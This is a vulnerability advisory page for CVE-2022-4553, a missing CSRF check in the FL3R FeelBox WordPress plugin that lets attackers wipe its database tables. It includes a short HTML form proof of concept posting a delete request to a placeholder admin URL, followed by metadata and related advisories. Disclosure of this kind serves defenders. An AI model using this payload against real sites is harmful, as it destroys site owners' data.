FL3R FeelBox <= 8.1 – Moods Reset via CSRF | CVE 2022-4553 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check when updating reseting moods which could allow attackers to make logged in admins perform such action via a CSRF attack and delete the lydl_posts & lydl_poststimestamp DB tables

Proof of Concept

Make a logged in admin open a page containing the HTML code below

<form action="https://example.com/wp-admin/options-general.php?page=feelbox" method="POST">
    <input type="text" name="feelbox_submit_hidden" value="Y">
    <input type="text" name="cleardata" value="DELETE">
    <input type="submit" name="submit" value="submit">
</form>

Affects Plugins

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

WPScan

Verified

Yes

WPVDB ID

483ed482-a1d1-44f6-8b99-56e653d3e45f

Timeline

Publicly Published

2023-01-04 (about 1 years ago)

Added

2023-01-04 (about 1 years ago)

Last Updated

2023-01-04 (about 1 years ago)

Other

Published

Title

Published

2023-06-26

Title

Image Map Pro – Drag-and-drop Builder for Interactive Images – Lite < 1.0.0 - CSRF to Stored XSS

Published

2023-11-03

Title

Email Templates < 1.4.3 - Email Sending via CSRF

Published

2023-06-03

Title

WP Hide Post <= 2.0.10 - Arbitrary Post Hiding via CSRF

Published

2023-02-06

Title

0mk Shortener <= 0.2 - Stored XSS via CSRF

Published

2023-07-26

Title

Saphali Woocommerce Lite < 1.9.0 - Settings Update/Reset via CSRF